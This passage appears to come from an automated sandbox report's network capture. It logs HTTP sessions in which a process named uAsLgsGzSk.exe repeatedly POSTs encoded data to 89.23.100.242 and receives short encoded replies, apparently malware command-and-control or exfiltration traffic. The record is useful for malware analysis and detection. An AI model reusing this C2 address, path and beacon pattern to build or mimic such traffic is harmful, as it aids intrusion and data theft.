                                                                                                Data Ascii: XvQqmD390ljHq+K+aoi8owJ+JttjoHGlk5M/vFPr5eg7YxJ9Dw4ODpjzUiNayzTUVjGD+2vrlDS8cWtJAd3mwhySP3g7MarI4bzbU6GEl32lThy6kiuviz5hPD/jgRcj861r0TjOtCGX7/Z8ruiX53s8QwW+XZT8Pk8arfAlWtfQMWes3IaeIXhoPz/A2vAk+feU2foJH1fiYyetd+4EcO6RjtVBzH0vad4lq6zxY3l5/+5bmzo
                                                                                                Jan 10, 2025 07:57:54.882107973 CET2472OUTData Raw: 79 68 51 67 51 72 4d 71 6a 2b 57 68 5a 37 54 56 6a 34 61 47 4a 76 59 33 58 63 62 48 32 78 61 30 4f 44 33 7a 35 48 74 4a 75 4f 4c 62 35 42 33 4d 54 71 2b 56 58 4d 4d 44 2f 52 4a 34 59 48 6f 4a 44 78 78 38 2b 4a 62 48 47 38 6e 6a 32 71 74 76 71 38
                                                                                                Data Ascii: yhQgQrMqj+WhZ7TVj4aGJvY3XcbH2xa0OD3z5HtJuOLb5B3MTq+VXMMD/RJ4YHoJDxx8+JbHG8nj2qtvq8dwg7XcZ/lrubmOMR74E+L99jSojRBBlfBAqx6V2qOh8mihtRGMkPD1RqlKl4gTrMuQv4dIm8Xc77y3SU/fIlzdf8RmQARoh1wIq/as2kGwMx2iLttfqi7Bnv7xds/R/1vMZz8e5t+vqEtyxpN78Pf2ETyBOorcM4G
                                                                                                Jan 10, 2025 07:57:54.882143974 CET2472OUTData Raw: 44 64 33 4e 74 76 4c 46 2b 6f 4e 6d 52 44 57 79 4c 61 4a 34 52 44 5a 61 68 52 51 4f 39 72 4b 50 39 70 44 53 6b 5a 49 67 5a 73 32 78 62 4b 78 74 31 56 61 32 48 58 66 32 66 6d 34 39 36 64 55 74 6d 42 54 7a 71 71 70 62 4b 39 64 49 53 73 74 65 44 37
                                                                                                Data Ascii: Dd3NtvLF+oNmRDWyLaJ4RDZahRQO9rKP9pDSkZIgZs2xbKxt1Va2HXf2fm496dUtmBTzqqpbK9dISsteD7htJNpIDg1woRgL7ZqyrTSVDvph8N3c6mzyGLkTd3rTrBN7zQRKUcQDkVG0oE8PqMlJ1m4FpjITj9uWp4CrQ7e8cyVkAnjJOej2UKCUntukpxAuI1NumZ1sS+ZuLHQHyVROKbKsMti4qDZ0SRWQJtx7m71JlqoIgpy
                                                                                                Jan 10, 2025 07:57:54.882251024 CET2472OUTData Raw: 43 51 70 6a 56 53 64 53 5a 67 74 4c 36 41 33 31 56 4e 65 48 33 56 58 73 2f 4a 4a 49 45 55 76 7a 46 62 4a 6f 37 75 32 71 58 43 30 4e 6d 63 7a 36 32 49 69 37 59 44 77 77 6a 69 75 51 69 68 65 5a 6f 48 7a 65 73 32 48 51 30 4f 61 6b 64 5a 53 41 2b 2f
                                                                                                Data Ascii: CQpjVSdSZgtL6A31VNeH3VXs/JJIEUvzFbJo7u2qXC0Nmcz62Ii7YDwwjiuQiheZoHzes2HQ0OakdZSA+/DoDRv4EekSH/jFj/sOnUZMa87X7bb8V68c1o1X/WxsD/3OyfZybZtp2DIpnnbj15+hP3/m8j5G92zLDNKkzjCxXV/HA+e/sIMuGfG59RIWp7rOC+k10pb+KSVGVO9YMYhMFyd0SjGep3W9sN7b7LeBv3qIHjvTo8L
                                                                                                Jan 10, 2025 07:57:54.887125015 CET2472OUTData Raw: 30 4a 74 58 78 70 41 39 5a 6d 4a 6b 74 6a 55 32 35 42 4a 79 4b 71 74 76 68 35 4b 2f 48 41 46 45 62 65 6b 36 4c 74 55 66 36 7a 42 63 75 64 4e 6c 37 44 67 36 69 4d 75 61 34 6c 6e 77 63 57 76 38 34 6e 63 45 78 77 4e 70 78 35 47 50 36 72 78 76 4e 38
                                                                                                Data Ascii: 0JtXxpA9ZmJktjU25BJyKqtvh5K/HAFEbek6LtUf6zBcudNl7Dg6iMua4lnwcWv84ncExwNpx5GP6rxvN8Q0pFrcmYA9cTiWE+ZTuVwWcWEylJ0yo75G7OGLkDtbj8BxmlgAR0F7UcNS7bjoy9tjX0wt9cWQH0hRiq2vF14sKcpzxXb0iXXcHjblDHG2UFYXoEj6VEBCh/uWSxr9LmsQ5WHBY2lXo2q/vy1RuvvnSSL4m0mh4PQ
Jan 10, 2025 07:57:55.275729895 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID: 23
Source IP: 192.168.2.4 | Source Port: 49764 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:54.547162056 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:54.892357111 CET | 2544 | OUT | Data Raw: 59 53 46 53 5e 5a 53 57 58 5b 57 56 50 58 5b 50 55 50 5e 52 54 59 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YSFS^ZSWX[WVPX[PUP^RTYQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$; <>=[+&/;\2<=(8$Z67U+7)?"14X$'_!/Y.%
Jan 10, 2025 07:57:55.295809984 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:55.449727058 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 24
Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:55.582652092 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:57:55.939254045 CET | 2544 | OUT | Data Raw: 5c 56 43 57 5b 5d 56 52 58 5b 57 56 50 5e 5b 51 55 56 5e 53 54 51 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \VCW[]VRX[WVP^[QUV^STQQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/(>&>%$-:R?=((<Z"4+3>?F&'0'_!/Y.=
Jan 10, 2025 07:57:56.344883919 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:56.478418112 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 25
Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:56.597197056 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:56.954626083 CET | 2544 | OUT | Data Raw: 5c 55 43 55 5e 5b 56 51 58 5b 57 56 50 5c 5b 5b 55 5c 5e 53 54 5a 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \UCU^[VQX[WVP\[[U\^STZQ[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';;[(=(5;;9%W?=](467W<+X)Y!%#':'_!/Y.


Session ID: 26
Source IP: 192.168.2.4 | Source Port: 49768 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:57.007466078 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2036
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:57.360899925 CET | 2036 | OUT | Data Raw: 59 54 43 56 5b 59 53 52 58 5b 57 56 50 5d 5b 56 55 52 5e 5c 54 51 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YTCV[YSRX[WVP][VUR^\TQQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D/!0+-=]?P?/*"<=,^(!8?3Z)%.<'*'_!/Y.1
Jan 10, 2025 07:57:57.750890970 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:57.886811972 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 0f 1e 39 1f 23 38 23 0e 24 3f 08 0b 2d 59 39 57 28 20 28 1d 2a 5b 2c 06 3d 0d 24 0d 3a 59 34 0b 22 15 0c 05 29 22 26 51 26 2f 2b 0f 32 37 21 59 0c 13 26 5f 3c 3a 2e 0c 29 03 20 5e 2b 31 0f 18 30 0d 02 06 33 13 00 08 21 3c 33 07 2b 29 22 0b 2b 08 32 0b 39 2a 2c 5f 3e 02 2c 1c 24 1c 2a 57 0c 1f 25 0e 22 0c 13 13 36 32 3e 11 30 01 3f 1f 30 01 28 57 25 01 02 05 23 3a 06 01 2c 39 20 5d 36 3d 37 06 3d 00 31 0f 22 22 27 0c 28 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
Data Ascii: 989#8#$?-Y9W( (*[,=$:Y4")"&Q&/+27!Y&_<:.) ^+103!<3+)"+29*,_>,$*W%"62>0?0(W%#:,9 ]6=7=1""'(, Q""P0]Q0


Session ID: 27
Source IP: 192.168.2.4 | Source Port: 49769 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:57.133534908 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2536
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:57.485857010 CET | 2536 | OUT | Data Raw: 59 51 46 55 5e 5d 56 5e 58 5b 57 56 50 5b 5b 57 55 57 5e 5e 54 5a 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YQFU^]V^X[WVP[[WUW^^TZQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;'X(![? ,>>.7?8!<<3Z=$.8_0'_!/Y.9
Jan 10, 2025 07:57:57.897707939 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:58.037674904 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 28
Source IP: 192.168.2.4 | Source Port: 49770 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:58.159732103 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:57:58.517132998 CET | 2544 | OUT | Data Raw: 5c 54 46 50 5b 59 56 56 58 5b 57 56 50 53 5b 50 55 50 5e 5d 54 5f 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \TFP[YVVX[WVPS[PUP^]T_Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,1Y<>:?6,%V<-? 5$'V*0?),*C&\$:'_!/Y.
Jan 10, 2025 07:57:58.919815063 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:57:59.070936918 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:57:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID: 29
Source IP: 192.168.2.4 | Source Port: 49772 | Destination IP: 89.23.100.242 | Destination Port: 80 | PID: 7860
Process: C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:57:59.189234972 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:57:59.548393965 CET | 2544 | OUT | Data Raw: 59 5e 46 54 5e 5b 56 50 58 5b 57 56 50 58 5b 54 55 5c 5e 53 54 5d 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: Y^FT^[VPX[WVPX[TU\^ST]Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,28+9<P8]/.>.'<8X"7#(3/_><>F1=^$'_!/Y.%
Jan 10, 2025 07:57:59.954938889 CET | 225 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 37 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:57:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49778 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:00.105047941 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:00.454629898 CET | 2544 | OUT | Data Raw: 5c 56 46 53 5e 56 56 54 58 5b 57 56 50 52 5b 56 55 50 5e 5d 54 5d 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \VFS^VVTX[WVPR[VUP^]T]QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'81/\+-)(6\/)R<- <(+!4#Q?)9&.$''_!/Y.
Jan 10, 2025 07:58:00.838918924 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:00.968684912 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:58:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49789 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:01.097579002 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:01.454739094 CET | 2544 | OUT | Data Raw: 5c 55 43 52 5b 5a 56 52 58 5b 57 56 50 5c 5b 5a 55 54 5e 5f 54 5c 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \UCR[ZVRX[WVP\[ZUT^_T\QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@81#?1(6[/\9R?4+8]"#P+0?^+?.2>4X3*'_!/Y.
Jan 10, 2025 07:58:01.932148933 CET | 225 | IN | HTTP/1.1 100 Continue
Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49795 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:02.056330919 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:58:02.407752037 CET | 2544 | OUT | Data Raw: 59 54 43 50 5b 5a 56 50 58 5b 57 56 50 5e 5b 54 55 50 5e 53 54 5e 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YTCP[ZVPX[WVP^[TUP^ST^QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,<2(P$,>?-$^?^?!,(03_=)&.$^$'_!/Y.=
Jan 10, 2025 07:58:02.803215027 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49796 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:02.925606012 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
